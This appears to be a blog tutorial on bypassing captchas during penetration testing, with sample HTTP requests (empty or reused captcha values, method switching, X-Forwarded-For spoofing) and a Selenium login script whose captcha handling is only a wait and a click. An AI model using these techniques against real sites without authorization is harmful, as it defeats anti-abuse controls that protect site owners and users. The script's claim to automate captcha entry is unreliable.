Captcha Bypass

Consider these techniques for bypassing captchas during penetration testing or bug bounty.

Method 1: Reuse Previous Captcha #

This technique involves using a captcha code that you’ve seen or solved before, assuming that the same code will work again multiple times.

POST /submit-form HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

captcha=ABC123 #{ola_captch_value}

In this example, we are submitting the same captcha code “ABC123” multiple times, hoping that one of the attempts will be accepted by the server.

Method 2: Submit Empty Captcha #

Trying to bypass the captcha by leaving the captcha field empty when submitting a form.

POST /submit-form HTTP/1.1 
Host: example.com 
Content-Type: application/x-www-form-urlencoded 

captcha=

Method 3: Alter Data Format #

Changing the format in which data is sent to the server, such as converting it to JSON or plain text, in the hope that the captcha won’t be validated.

A sample POST request with JSON data instead of the expected XML data:

POST /submit-data HTTP/1.1 
Host: example.com 
Content-Type: application/json 

{ 
"key": "value", 
"captcha": "YourCaptchaCodeHere" 
}

Method 4: Change Request Method #

Modify the way you send requests to the server by switching between different HTTP request methods like GET, POST, or PUT.

A sample GET request instead of the expected POST request:

GET /submit-data?key=value&captcha=YourCaptchaCodeHere HTTP/1.1 
Host: example.com

Method 5: Manipulate Headers #

Using custom headers like X-Forwarded-For, X-Remote-IP, X-Original-IP, X-Remote-Addr, etc., to make it appear as though the requests are coming from different IP addresses, thereby avoiding captcha validation.

A sample GET request with a custom “X-Forwarded-For” header:

GET /page HTTP/1.1 
Host: example.com 
X-Forwarded-For: 127.0.0.1

Method 6: Inspect Parameters #

Always thoroughly examine the entire request (body, headers, or uri part) and understand the purpose of each parameter. By changing certain parameter values, you might find a way to bypass the captcha.

POST /submit-form HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

user_id=12345
captcha=WXYZ789

In this case, the “user_id” parameter might be related to captcha validation. By experimenting with different values for “user_id,” you may discover a way to bypass the captcha.

Method 7: Automate with Tools #

Using automation tools like Selenium or OCR (Optical Character Recognition) software to automatically identify and solve captchas.

Here’s a Python Selenium script that automates captcha entry:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

url = "https://example.com/login"
username = "your_username"
password = "your_password"
driver = webdriver.Chrome(executable_path='/path/to/chromedriver')

try:
driver.get(url)
username_field = driver.find_element(By.ID, "username_field_id")
password_field = driver.find_element(By.ID, "password_field_id")
username_field.send_keys(username)
password_field.send_keys(password)

WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "captcha_element_id")))
login_button = driver.find_element(By.ID, "login_button_id")
login_button.click()
WebDriverWait(driver, 10).until(EC.url_to_be("https://example.com/dashboard"))
except Exception as e:
print("An error occurred:", str(e))

finally:
# Close the WebDriver
driver.quit()

Method 8: Human-Based Captcha Solving Services #

Instead of automated methods, you can use human-based captcha-solving services where real individuals solve captchas for you in exchange for a fee.

Leave a Reply